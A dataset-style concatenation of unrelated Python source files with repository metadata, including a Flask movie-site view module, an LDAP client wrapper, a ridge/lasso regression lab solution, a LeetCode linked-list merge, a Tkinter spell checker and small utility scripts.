43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
import abc
from abc_base import PluginBase
class LocalBaseClass:
pass
@PluginBase.register
class RegisterImplementation(LocalBaseClass):
def load(self, input):
return input.read()
def save(self, output, data):
return output.write(data)
if __name__ == "__main__":
print("Subclass:", issubclass(RegisterImplementation, PluginBase))
print("Instance:", isinstance(RegisterImplementation(), PluginBase))
| 22 | 73 | 0.692641 |
43a274f75c99b891819d3091e48fdb226c5fd96a
| 2,660 |
py
|
Python
|
docs/labs/lab5/solutions/solution1.py
|
yankeesong/2021-CS109A
|
0fea6b4411092446719d09379c6a12815aa91ab2
|
[
"MIT"
] | 19 |
2021-08-29T21:23:48.000Z
|
2022-03-16T14:38:25.000Z
|
docs/labs/lab5/solutions/solution1.py
|
SBalas/2021-CS109A
|
0f57c3d80b7cef99d660f6a77c0166cffc1253e8
|
[
"MIT"
] | null | null | null |
docs/labs/lab5/solutions/solution1.py
|
SBalas/2021-CS109A
|
0f57c3d80b7cef99d660f6a77c0166cffc1253e8
|
[
"MIT"
] | 22 |
2021-09-01T13:03:05.000Z
|
2022-03-31T14:34:36.000Z
|
# Imports this solution relies on (normally provided by the lab notebook;
# add_higher_order_polynomial_terms and best_least_squares_r2 are defined
# earlier in the lab and are assumed to be in scope):
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import RidgeCV, LassoCV
def preprocess(df, standardize = False):
    """Splits the data into training and test sets.
    arguments:
    df: the dataframe of training and test data you want to split.
    standardize: if True returns standardized data.
    """
#split the data
train, test = train_test_split(df, train_size=0.8, random_state = 42)
#sort the data
train = train.sort_values(by = ["x1"])
test = test.sort_values(by = ["x1"])
train.describe()
X_train, y_train = train[["x1"]], train["y"]
X_test, y_test = test[["x1"]], test["y"]
X_train_N = add_higher_order_polynomial_terms(X_train, N=15)
X_test_N = add_higher_order_polynomial_terms(X_test, N=15)
if standardize:
scaler = StandardScaler().fit(X_train_N)
X_train_N = scaler.transform(X_train_N)
X_test_N = scaler.transform(X_test_N)
#"X_val" : X_val_N, "y_val" : y_val,
datasets = {"X_train": X_train_N, "y_train": y_train, "X_test" : X_test_N, "y_test": y_test}
return(datasets)
def fit_ridge_and_lasso_cv(X_train, y_train, X_test, y_test,
k = None, alphas = [10**9], best_OLS_r2 = best_least_squares_r2 ): #X_val, y_val,
""" takes in train and validation test sets and reports the best selected model using ridge and lasso regression.
Arguments:
X_train: the train design matrix
y_train: the reponse variable for the training set
X_val: the validation design matrix
y_train: the reponse variable for the validation set
k: the number of k-fold cross validation sections to be fed to Ridge and Lasso Regularization.
"""
# Let us do k-fold cross validation
fitted_ridge = RidgeCV(alphas=alphas, cv = k).fit(X_train, y_train)
fitted_lasso = LassoCV(alphas=alphas, cv = k).fit(X_train, y_train)
print('R^2 score for our original OLS model: {}\n'.format(best_OLS_r2))
ridge_a = fitted_ridge.alpha_
ridge_score = fitted_ridge.score(X_test, y_test)
print('Best alpha for ridge: {}'.format(ridge_a))
print('R^2 score for Ridge with alpha={}: {}\n'.format(ridge_a, ridge_score))
lasso_a = fitted_lasso.alpha_
lasso_score = fitted_lasso.score(X_test, y_test)
print('Best alpha for lasso: {}'.format(lasso_a))
print('R^2 score for Lasso with alpha={}: {}'.format(lasso_a, lasso_score))
r2_df = pd.DataFrame({"OLS": best_OLS_r2, "Lasso" : lasso_score, "Ridge" : ridge_score}, index = [0])
r2_df = r2_df.melt()
r2_df.columns = ["model", "r2_Score"]
plt.title("Validation set")
sns.barplot(x = "model", y = "r2_Score", data = r2_df)
plt.show()
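# A usage sketch under the lab's assumptions -- `df` holds columns x1 and y, and
# the alpha grid below is a hypothetical choice for RidgeCV/LassoCV to search:
#     datasets = preprocess(df, standardize=True)
#     fit_ridge_and_lasso_cv(datasets["X_train"], datasets["y_train"],
#                            datasets["X_test"], datasets["y_test"],
#                            k=5, alphas=np.logspace(-4, 2, 20))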
| 40.923077 | 117 | 0.658647 |
43c9b0c4273e8e5eb8ebb7d3ef50508cde1bec57
| 271 |
py
|
Python
|
session15/walk_dir.py
|
NeumannSven/pyshb_programmierkurs
|
518da3766dff36e938b36c49d410edb52c0cb32c
|
[
"MIT"
] | 2 |
2019-10-26T12:47:05.000Z
|
2020-07-07T16:36:19.000Z
|
session15/walk_dir.py
|
NeumannSven/pyshb_programmierkurs
|
518da3766dff36e938b36c49d410edb52c0cb32c
|
[
"MIT"
] | null | null | null |
session15/walk_dir.py
|
NeumannSven/pyshb_programmierkurs
|
518da3766dff36e938b36c49d410edb52c0cb32c
|
[
"MIT"
] | 4 |
2020-02-28T13:43:05.000Z
|
2020-12-02T10:39:46.000Z
|
import os
startpath = 'session15/Tageshoroskope 2020'
os.chdir(startpath)
doclist = []
for i in os.walk('.'):
for d in i[2]:
if d.endswith(".docx"):
            n = startpath + i[0][1:] + '/' + d  # strip only the leading '.'; replace('.', '') would mangle names containing dots
doclist.append(n)
print(doclist)
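# An equivalent sketch with pathlib (same folder layout assumed; run before the
# os.chdir call so the start path is still valid) -- rglob walks the tree
# recursively, so no manual path stitching is needed:
#     from pathlib import Path
#     doclist = [str(p) for p in Path(startpath).rglob('*.docx')]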
| 19.357143 | 60 | 0.546125 |
7163e59fdf69065377b620e38552d693b8a45bc5
| 2,306 |
py
|
Python
|
python/course/leetcode/1~27/21. Merge Two Sorted Lists.py
|
TimVan1596/ACM-ICPC
|
07f7d728db1ecd09c5a3d0f05521930b14eb9883
|
[
"Apache-2.0"
] | 1 |
2019-05-22T07:12:34.000Z
|
2019-05-22T07:12:34.000Z
|
python/course/leetcode/1~27/21. Merge Two Sorted Lists.py
|
TimVan1596/ACM-ICPC
|
07f7d728db1ecd09c5a3d0f05521930b14eb9883
|
[
"Apache-2.0"
] | 3 |
2021-12-10T01:13:54.000Z
|
2021-12-14T21:18:42.000Z
|
python/course/leetcode/1~27/21. Merge Two Sorted Lists.py
|
TimVan1596/ACM-ICPC
|
07f7d728db1ecd09c5a3d0f05521930b14eb9883
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
# @Time:2020/6/21 17:13
# @Author:TimVan
# @File:21. Merge Two Sorted Lists.py
# @Software:PyCharm
# 21. Merge Two Sorted Lists
# Merge two sorted linked lists and return it as a new sorted list.
# The new list should be made by splicing together the nodes of the first two lists.
#
# Example 1:
# Input: 1->2->4, 1->3->4
# Output: 1->1->2->3->4->4
#
# Example 2:
# Input: 1->7->10->44->100, 2->3->4
# Output: 1->2->3->4->7->10->44->100
# Definition for singly-linked list.
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
# Solution 1: the straightforward approach, walking both linked lists directly
class Solution:
def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:
p = l1
q = l2
        # result list with a dummy head node
newListNode = ListNode(0)
m = newListNode
while p and q:
first = p.val
second = q.val
if first <= second:
m.next = ListNode(first)
m = m.next
p = p.next
            # when the two values are equal, both branches run and both nodes are appended
if first >= second:
m.next = ListNode(second)
m = m.next
q = q.next
        # if p or q still has nodes left, splice the remainder on directly
if p is not None:
m.next = ListNode(p.val)
m = m.next
m.next = p.next
elif q is not None:
m.next = ListNode(q.val)
m = m.next
m.next = q.next
return newListNode.next
# Solution 2: link the two lists into one chain and sort it
# (requires ordering/comparing nodes -- see the sketch below)
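# A minimal sketch of Solution 2 (assumption: both inputs are well-formed
# ListNode chains). Collect the nodes, sort by value, then relink --
# O((m+n) log(m+n)) instead of the O(m+n) merge above:
class Solution2:
    def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:
        nodes = []
        for head in (l1, l2):
            while head:                        # gather every node from both lists
                nodes.append(head)
                head = head.next
        nodes.sort(key=lambda node: node.val)  # order nodes by their value
        for first, second in zip(nodes, nodes[1:]):
            first.next = second                # relink in sorted order
        if not nodes:
            return None
        nodes[-1].next = None                  # terminate the merged list
        return nodes[0]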
# first test case
listNode1 = ListNode(1)
listNode1.next = ListNode(2)
listNode1.next.next = ListNode(4)
listNode2 = ListNode(1)
listNode2.next = ListNode(3)
listNode2.next.next = ListNode(4)
# second test case
listNode3 = ListNode(1)
listNode3.next = ListNode(7)
listNode3.next.next = ListNode(10)
listNode3.next.next.next = ListNode(44)
listNode3.next.next.next.next = ListNode(100)
listNode4 = ListNode(2)
listNode4.next = ListNode(3)
listNode4.next.next = ListNode(4)
# third test case (edge case: one list is empty)
listNode5 = None
listNode6 = ListNode(0)
solution = Solution()
inputArr = [
(listNode1, listNode2),
(listNode3, listNode4),
(listNode5, listNode6)
]
for one in inputArr:
start = solution.mergeTwoLists(one[0], one[1])
print("[", end="")
while start:
print(start.val, end=",")
start = start.next
print("]")
| 24.020833 | 84 | 0.578491 |
e0f3fcc32858a00963d6223a9f9378f8c626cfd3
| 1,075 |
py
|
Python
|
py_projects/spell_checker/spell.py
|
Anwesha-dash811/hacktober-1
|
188c859864f06f94a94cb91e63979366db62b9ac
|
[
"MIT"
] | 1 |
2020-10-04T12:36:45.000Z
|
2020-10-04T12:36:45.000Z
|
py_projects/spell_checker/spell.py
|
Anwesha-dash811/hacktober-1
|
188c859864f06f94a94cb91e63979366db62b9ac
|
[
"MIT"
] | 1 |
2021-09-30T16:20:57.000Z
|
2021-09-30T16:20:57.000Z
|
py_projects/spell_checker/spell.py
|
Anwesha-dash811/hacktober-1
|
188c859864f06f94a94cb91e63979366db62b9ac
|
[
"MIT"
] | 3 |
2020-10-04T10:07:10.000Z
|
2020-10-25T15:21:15.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 28 22:26:53 2020
@author: DELL
"""
from textblob import TextBlob
import tkinter as tk
from tkinter import END
def correction() :
input_word = entry1.get()
blob_obj = TextBlob(input_word)
corrected_word = str(blob_obj.correct())
    entry2.delete(0, END)  # clear the previous result so repeated clicks don't append
    entry2.insert(0, corrected_word)
def clearAll() :
entry1.delete(0, END)
entry2.delete(0, END)
win=tk.Tk()
win.geometry("400x350")
win.title("Spell Checker")
win.configure(background = 'light cyan')
label1=tk.Label(win,text="Write anything here",font=("times",15,"bold"))
label1.grid(row=1,column=0)
entry1=tk.Entry(win,width=50)
entry1.grid(row=1,column=2)
label2=tk.Label(win,text="Corrected statement",font=("times",15,"bold"))
label2.grid(row=3,column=0)
entry2=tk.Entry(win,width=50)
entry2.grid(row=3,column=2)
b1=tk.Button(win,text="Correct",width=20,command=correction)
b1.grid(row=5,column=0)
b2=tk.Button(win,text="Exit",width=20,command=clearAll)
b2.grid(row=5,column=2)
win.mainloop()
| 26.219512 | 73 | 0.667907 |
1cd15586173a513c0492b613fb150ee7b36e7f70
| 9,939 |
py
|
Python
|
weidianying/app/home/views.py
|
cici258/flask-movie
|
6724cf8f3eb5404439647e9492acbddb5e419014
|
[
"MIT"
] | 1 |
2019-07-01T07:27:45.000Z
|
2019-07-01T07:27:45.000Z
|
weidianying/app/home/views.py
|
cici258/flask-movie
|
6724cf8f3eb5404439647e9492acbddb5e419014
|
[
"MIT"
] | null | null | null |
weidianying/app/home/views.py
|
cici258/flask-movie
|
6724cf8f3eb5404439647e9492acbddb5e419014
|
[
"MIT"
] | null | null | null |
from . import home
from flask import render_template, redirect, url_for, flash, session, request
from app.home.forms import RegisterForm, LoginForm, UserdetailForm, PwdForm, CommentForm
from app.models import User, Userlog, Preview, Tag, Movie, Comment, Moviecol
from werkzeug.security import generate_password_hash
from werkzeug.utils import secure_filename
import uuid
from app import db, app
from functools import wraps
import os
import datetime
# give uploaded files a unique, timestamped name
def change_filename(filename):
fileinfo = os.path.splitext(filename)
filename = datetime.datetime.now().strftime("%Y%m%d%H%M%S") + str(uuid.uuid4().hex) + fileinfo[-1]
return filename
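# Worked example (hypothetical input): change_filename("avatar.png") returns
# the current timestamp plus 32 random hex chars plus the original extension,
# e.g. "20240101120000" + "3f2c...d1" + ".png" -- unique for every upload.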
# login-required decorator
def user_login_req(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if "user" not in session:
return redirect(url_for("home.login", next=request.url))
return f(*args, **kwargs)
return decorated_function
# home page
@home.route("/<int:page>",methods=["GET"])
def index(page=None):
tags = Tag.query.all()
page_data = Movie.query
tid = request.args.get("tid",0)
if int(tid) != 0:
page_data = page_data.filter_by(tag_id=int(tid))
star = request.args.get("star", 0)
if int(star) != 0:
page_data = page_data.filter_by(starnum=int(star))
time = request.args.get("time", 0)
if int(time) != 0:
if int(time) == 1:
page_data = page_data.order_by(Movie.addtime.desc())
else:
page_data = page_data.order_by(Movie.addtime.asc())
pm = request.args.get("pm", 0)
if int(pm) != 0:
if int(pm) == 1:
page_data = page_data.order_by(Movie.playnum.desc())
else:
page_data = page_data.order_by(Movie.playnum.asc())
cm = request.args.get("cm", 0)
if int(cm) != 0:
if int(cm) == 1:
page_data = page_data.order_by(Movie.commentnum.desc())
else:
page_data = page_data.order_by(Movie.commentnum.asc())
if page is None:
page = 1
page = request.args.get("page",1)
page_data = page_data.paginate(page=int(page),per_page=10)
p = dict(
tid=tid,
star=star,
time=time,
pm=pm,
cm=cm
)
return render_template("home/index.html",tags=tags,p=p,page_data=page_data)
# login
@home.route("/login", methods=["GET", "POST"])
def login():
form = LoginForm()
if form.validate_on_submit():
data = form.data
user = User.query.filter_by(name=data["name"]).first()
if user:
if not user.check_pwd(data["pwd"]):
flash("密码错误", "err")
return redirect(url_for("home.login"))
else:
flash("账号不存在","err")
return redirect(url_for("home.login"))
session["user"] = user.name
session["user_id"] = user.id
userlog = Userlog(
user_id=user.id,
ip=request.remote_addr
)
db.session.add(userlog)
db.session.commit()
return redirect(url_for("home.user", user=user))
return render_template("home/login.html", form=form)
@home.route("/logout")
def logout():
session.pop("user", None)
session.pop("id", None)
return redirect(url_for("home.login"))
# register
@home.route("/register", methods=["GET", "POST"])
def register():
form = RegisterForm()
if form.validate_on_submit():
data = form.data
user = User(
name=data["name"],
email=data["email"],
phone=data["phone"],
pwd=generate_password_hash(data["pwd"]),
uuid=uuid.uuid4().hex
)
db.session.add(user)
db.session.commit()
flash("注册成功", "ok")
return render_template("home/register.html", form=form)
# member profile
@home.route("/user", methods=["GET", "POST"])
@user_login_req
def user():
form = UserdetailForm()
user = User.query.get(int(session["user_id"]))
form.face.validators = []
if request.method == "GET":
        # pre-populate the form fields
form.name.data = user.name
form.phone.data = user.phone
form.email.data = user.email
form.face.data = user.face
form.info.data = user.info
if form.validate_on_submit():
data = form.data
if form.face.data != "":
file_face = secure_filename(form.face.data.filename)
if not os.path.exists(app.config["FACE_DIR"]):
os.makedirs(app.config["FACE_DIR"])
                os.chmod(app.config["FACE_DIR"], 0o755)  # chmod takes a numeric mode, not the string "rw"
user.face = change_filename(file_face)
form.face.data.save(app.config["FACE_DIR"] + user.face)
name_count = User.query.filter_by(name=data["name"]).count()
if data["name"] != user.name and name_count == 1:
flash("昵称已存在", "err")
return redirect(url_for("home.user"))
        email_count = User.query.filter_by(email=data["email"]).count()  # filter on the email column, not name
if data["email"] != user.email and email_count == 1:
flash("邮箱已存在", "err")
return redirect(url_for("home.user"))
        phone_count = User.query.filter_by(phone=data["phone"]).count()  # filter on the phone column, not name
if data["phone"] != user.phone and phone_count == 1:
flash("手机已存在", "err")
return redirect(url_for("home.user"))
user.name = data["name"]
user.email = data["email"]
user.phone = data["phone"]
user.info = data["info"]
db.session.add(user)
db.session.commit()
flash("修改成功", "ok")
return redirect(url_for("home.user"))
return render_template("home/user.html", form=form, user=user)
# change password
@home.route("/pwd", methods=["GET", "POST"])
@user_login_req
def pwd():
form = PwdForm()
if form.validate_on_submit():
data = form.data
user = User.query.get_or_404(int(session["user_id"]))
if not user.check_pwd(data["oldpwd"]):
flash("旧密码错误", "err")
return redirect(url_for('home.pwd'))
user.pwd = generate_password_hash(data["newpwd"])
db.session.add(user)
db.session.commit()
flash("修改密码成功", "ok")
return redirect(url_for('home.pwd'))
return render_template("home/pwd.html", form=form)
# comment history
@home.route("/comments/<int:page>",methods=["GET","POST"])
@user_login_req
def comments(page=None):
if page is None:
page = 1
page_data = Comment.query.join(
Movie
).join(
User
).filter(
Movie.id == Comment.movie_id,
User.id == session["user_id"]
).order_by(
        Comment.addtime.desc()  # order by when the comment was made, not by the user record
).paginate(page=page, per_page=10)
return render_template("home/comments.html",page_data=page_data)
# login log
@home.route("/loginlog/<int:page>", methods=["GET", "POST"])
@user_login_req
def loginlog(page=None):
if page is None:
page = 1
page_data = Userlog.query.join(
User
).filter(
User.id == Userlog.user_id
).order_by(
Userlog.addtime.desc()
).paginate(page=page, per_page=10)
return render_template("home/loginlog.html", page_data=page_data)
# add a movie to the user's favorites
@home.route("/moviecol/add",methods=["GET"])
@user_login_req
def moviecol_add():
mid = request.args.get("mid","")
uid = request.args.get("uid", "")
moviecol = Moviecol.query.filter_by(
user_id=int(uid),
movie_id=int(mid)
).count()
if moviecol == 1:
data = dict(ok=0)
if moviecol == 0:
moviecol = Moviecol(
movie_id=int(mid),
user_id=int(uid)
)
db.session.add(moviecol)
db.session.commit()
data = dict(ok=1)
import json
return json.dumps(data)
# the user's favorite movies
@home.route("/moviecol/<int:page>")
@user_login_req
def moviecol(page=None):
if page is None:
page = 1
page_data = Moviecol.query.join(
Movie
).join(
User
).filter(
Movie.id == Moviecol.movie_id,
User.id == session["user_id"]
).order_by(
Moviecol.addtime.desc()
).paginate(page=page,per_page=10)
return render_template("home/moviecol.html",page_data=page_data)
# coming-soon previews
@home.route("/animation")
def animation():
data = Preview.query.all()
return render_template("home/animation.html",data=data)
# search
@home.route("/search/<int:page>")
def search(page=None):
if page is None:
page = 1
key = request.args.get("key","")
movie_count = Movie.query.filter(
Movie.title.ilike("%" + key + "%")
).count()
page_data = Movie.query.filter(
Movie.title.ilike("%" + key + "%")
).order_by(
Movie.addtime.desc()
).paginate(page=page,per_page=10)
return render_template("home/search.html",key=key,page_data=page_data,movie_count=movie_count)
# movie playback
@home.route("/play/<int:id>/<int:page>",methods=["GET","POST"])  # movie detail page
def play(id=None,page=None):
movie = Movie.query.join(
Tag
).filter(
Tag.id == Movie.tag_id,
Movie.id == int(id)
).first_or_404()
if page is None:
page = 1
page_data = Comment.query.join(
Movie
).join(
User
).filter(
Movie.id == movie.id,
User.id == Comment.user_id
).order_by(
        Comment.addtime.desc()  # order comments by their own timestamp
).paginate(page=page, per_page=10)
movie.playnum = movie.playnum + 1
form = CommentForm()
if "user" in session and form.validate_on_submit():
data = form.data
comment = Comment(
content = data["content"],
movie_id = movie.id,
user_id = session["user_id"]
)
db.session.add(comment)
db.session.commit()
movie.commentnum = movie.commentnum + 1
db.session.add(movie)
db.session.commit()
flash("添加评论成功","ok")
return redirect(url_for('home.play',id=movie.id,page=1))
db.session.add(movie)
db.session.commit()
return render_template("home/play.html",movie=movie,form=form,page_data=page_data)
| 29.146628 | 102 | 0.594426 |
1cffa8d5ab9c50dc112abe12d918224cb0a87fda
| 20 |
py
|
Python
|
RDS/circle3_central_services/token_storage/src/api/Token/__init__.py
|
Sciebo-RDS/Sciebo-RDS
|
d71cf449ed045a2a7a049e2cb77c99fd5a9195bd
|
[
"MIT"
] | 10 |
2020-06-24T08:22:24.000Z
|
2022-01-13T16:17:36.000Z
|
RDS/circle3_central_services/token_storage/src/api/Token/__init__.py
|
Sciebo-RDS/Sciebo-RDS
|
d71cf449ed045a2a7a049e2cb77c99fd5a9195bd
|
[
"MIT"
] | 78 |
2020-01-23T14:32:06.000Z
|
2022-03-07T14:11:16.000Z
|
RDS/circle3_central_services/token_storage/src/api/Token/__init__.py
|
Sciebo-RDS/Sciebo-RDS
|
d71cf449ed045a2a7a049e2cb77c99fd5a9195bd
|
[
"MIT"
] | 1 |
2020-06-24T08:33:48.000Z
|
2020-06-24T08:33:48.000Z
|
from .Token import *
| 20 | 20 | 0.75 |
e821422bf6c2ed995ada774f11b55a498b04f25b
| 547 |
py
|
Python
|
exercises/pt/exc_04_10.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/pt/exc_04_10.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/pt/exc_04_10.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
TRAINING_DATA = [
(
"i went to amsterdem last year and the canals were beautiful",
{"entities": [(10, 19, "TOURIST_DESTINATION")]},
),
(
"You should visit Paris once in your life, but the Eiffel Tower is kinda boring",
{"entities": [(17, 22, "TOURIST_DESTINATION")]},
),
("There's also a Paris in Arkansas, lol", {"entities": []}),
(
"Berlin is perfect for summer holiday: lots of parks, great nightlife, cheap beer!",
{"entities": [(0, 6, "TOURIST_DESTINATION")]},
),
]
| 34.1875 | 92 | 0.581353 |
404627ca2d0da8f17945d99611ee22b401f19e27
| 3,367 |
py
|
Python
|
src/onegov/user/auth/clients/ldap.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/user/auth/clients/ldap.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/user/auth/clients/ldap.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
import socket
from attr import attrs, attrib
from cached_property import cached_property
from contextlib import suppress
from ldap3 import Connection, Server, NONE, RESTARTABLE
from ldap3.core.exceptions import LDAPCommunicationError
from time import sleep
def auto_retry(fn, max_tries=5, pause=0.1):
""" Retries the decorated function if a LDAP connection error occurs, up
to a given set of retries, using linear backoff.
"""
tried = 0
def retry(self, *args, **kwargs):
nonlocal tried
try:
return fn(self, *args, **kwargs)
except (LDAPCommunicationError, socket.error):
tried += 1
if tried >= max_tries:
raise
            sleep(tried * pause)  # linear backoff using the configured pause, not a hard-coded 0.1
with suppress(ValueError):
self.try_configuration()
return retry(self, *args, **kwargs)
return retry
@attrs()
class LDAPClient():
# The URL of the LDAP server
url: str = attrib()
# The username for the LDAP connection
username: str = attrib()
# The password for the LDAP connection
password: str = attrib()
@property
def base_dn(self):
""" Extracts the distinguished name from the username. """
name = self.username.lower()
if 'dc=' in name:
return 'dc=' + name.split(",dc=", 1)[-1]
return ''
@cached_property
def connection(self):
""" Returns the read-only connection to the LDAP server.
Calling this property is not enough to ensure that the connection is
possible. You should use :meth:`try_configuration` for that.
"""
return Connection(
server=Server(self.url, get_info=NONE),
read_only=True,
auto_bind=False,
client_strategy=RESTARTABLE,
)
def try_configuration(self):
""" Verifies the connection to the LDAP server. """
# disconnect if necessary
with suppress(LDAPCommunicationError, socket.error):
self.connection.unbind()
# clear cache
del self.__dict__['connection']
# reconnect
if not self.connection.rebind(self.username, self.password):
raise ValueError(f"Failed to connect to {self.url}")
@auto_retry
def search(self, query, attributes=()):
""" Runs an LDAP query against the server and returns a dictionary
with the distinguished name as key and the given attributes as values
(also a dict).
"""
self.connection.search(self.base_dn, query, attributes=attributes)
return {
entry.entry_dn: entry.entry_attributes_as_dict
for entry in self.connection.entries
}
@auto_retry
def compare(self, name, attribute, value):
""" Returns true if given user's attribute has the expected value.
:param name:
The distinguished name (DN) of the LDAP user.
:param attribute:
The attribute to query.
:param value:
The value to compare to.
The method returns True if the given value is found on the user.
This is most notably used for password checks. For example::
client.compare('cn=admin', 'userPassword', 'hunter2')
"""
return self.connection.compare(name, attribute, value)
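# A minimal usage sketch (hypothetical server URL and credentials):
#
#     client = LDAPClient(
#         url='ldaps://ldap.example.org',
#         username='cn=admin,dc=example,dc=org',
#         password='secret',
#     )
#     client.try_configuration()  # raises ValueError if the bind fails
#     people = client.search('(objectClass=person)', attributes=['mail'])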
| 26.511811 | 77 | 0.616573 |
907800f3855a155bea90009e468895ee75749e7d
| 795 |
py
|
Python
|
Server/jsonDataReader.py
|
EiS94/Bewaesserungsanlage
|
8edc0c8b5113219724b13c56fb296a003e83aad0
|
[
"MIT"
] | null | null | null |
Server/jsonDataReader.py
|
EiS94/Bewaesserungsanlage
|
8edc0c8b5113219724b13c56fb296a003e83aad0
|
[
"MIT"
] | null | null | null |
Server/jsonDataReader.py
|
EiS94/Bewaesserungsanlage
|
8edc0c8b5113219724b13c56fb296a003e83aad0
|
[
"MIT"
] | null | null | null |
import json
class jsonDataReader:
wetness = None
rain = None
temperatur = None
plant1 = None
plant2 = None
plant3 = None
plant4 = None
plant5 = None
timestamp = None
valve = None
def __init__(self):
with open('data.json') as json_file:
data = json.load(json_file)
            for p in data['data']:  # note: each iteration overwrites, so only the last record is kept
self.wetness = p['wetness']
self.rain = p['rain']
self.temperatur = p['temperatur']
self.plant1 = p['plant1']
self.plant2 = p['plant2']
self.plant3 = p['plant3']
self.plant4 = p['plant4']
self.plant5 = p['plant5']
self.timestamp = p['timestamp']
self.valve = p['valve']
| 27.413793 | 49 | 0.491824 |
463b8a39a649f587aba557aa336c44e30374f76e
| 1,912 |
py
|
Python
|
official/cv/cnn_direction_model/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/cnn_direction_model/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/cnn_direction_model/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
'''post process for 310 inference'''
import os
import argparse
import numpy as np
parser = argparse.ArgumentParser(description='post process for cnn')
parser.add_argument("--result_path", type=str, required=True, help="result file path")
parser.add_argument("--label_path", type=str, required=True, help="label file")
args = parser.parse_args()
def cal_acc(result_path, label_path):
img_total = 0
top1_correct = 0
result_shape = (1, 2)
files = os.listdir(result_path)
for file in files:
full_file_path = os.path.join(result_path, file)
if os.path.isfile(full_file_path):
result = np.fromfile(full_file_path, dtype=np.float32).reshape(result_shape)
label_file = os.path.join(label_path, file.split(".bin")[0][:-2] + ".bin")
gt_classes = np.fromfile(label_file, dtype=np.int32)
top1_output = np.argmax(result, (-1))
t1_correct = np.equal(top1_output, gt_classes).sum()
top1_correct += t1_correct
img_total += 1
acc1 = 100.0 * top1_correct / img_total
print('top1_correct={}, total={}, acc={:.2f}%'.format(top1_correct, img_total, acc1))
if __name__ == "__main__":
cal_acc(args.result_path, args.label_path)
| 38.24 | 89 | 0.671025 |
469bb0a49c10f7da0f03f9c61fd0c17edd512333
| 711 |
py
|
Python
|
11_GUI/AdasGui6/scripts/heading_degree.py
|
franneck94/UdemyCppExercises
|
862d3e3df198ef8f3c7b850bbeead6161700f9d1
|
[
"MIT"
] | null | null | null |
11_GUI/AdasGui6/scripts/heading_degree.py
|
franneck94/UdemyCppExercises
|
862d3e3df198ef8f3c7b850bbeead6161700f9d1
|
[
"MIT"
] | null | null | null |
11_GUI/AdasGui6/scripts/heading_degree.py
|
franneck94/UdemyCppExercises
|
862d3e3df198ef8f3c7b850bbeead6161700f9d1
|
[
"MIT"
] | 5 |
2022-02-06T20:05:07.000Z
|
2022-03-10T12:48:58.000Z
|
import math
import numpy as np
import matplotlib.pyplot as plt
def main() -> int:
v_long = 3.0
v_lat = 1.0
print(f"v_long: {v_long}")
print(f"v_lat: {v_lat}")
    # since left is negative and right is positive in our coordinate system
a2 = np.arctan2(v_lat * -1.0, v_long)
print(f"arctan2: {a2}")
deg = (a2 / np.pi) * 180.0
if deg < 0.0:
deg = deg + 360.0
print(f"deg: {deg}")
angle = [deg for _ in range(5)]
angle = [math.radians(a) for a in angle]
rs = [i for i in range(5)]
fig, ax = plt.subplots(subplot_kw={'projection': 'polar'})
ax.plot(angle, rs)
ax.grid(True)
plt.show()
return 0
if __name__ == "__main__":
main()
| 20.911765 | 75 | 0.580872 |
d3bd61173aeb330bce7812e3546cea6a4eca711b
| 1,681 |
py
|
Python
|
post/count_items.py
|
PAULUAPAUL/MasterThesis_AssociationRulesBiodiversity
|
0855abc5ec4835a28be4aa305e5e45e73297b389
|
[
"MIT"
] | null | null | null |
post/count_items.py
|
PAULUAPAUL/MasterThesis_AssociationRulesBiodiversity
|
0855abc5ec4835a28be4aa305e5e45e73297b389
|
[
"MIT"
] | null | null | null |
post/count_items.py
|
PAULUAPAUL/MasterThesis_AssociationRulesBiodiversity
|
0855abc5ec4835a28be4aa305e5e45e73297b389
|
[
"MIT"
] | null | null | null |
import csv
from collections import Counter
from collections import defaultdict
import os
words_LHS=[]
words_RHS=[]
path=r"C:\Users\Paul\Documents\Studium_PP\Master\Masterarbeit\Gitlab\master-thesis-data-mining\student_work\Code\data\Apriori-Int_0.1"
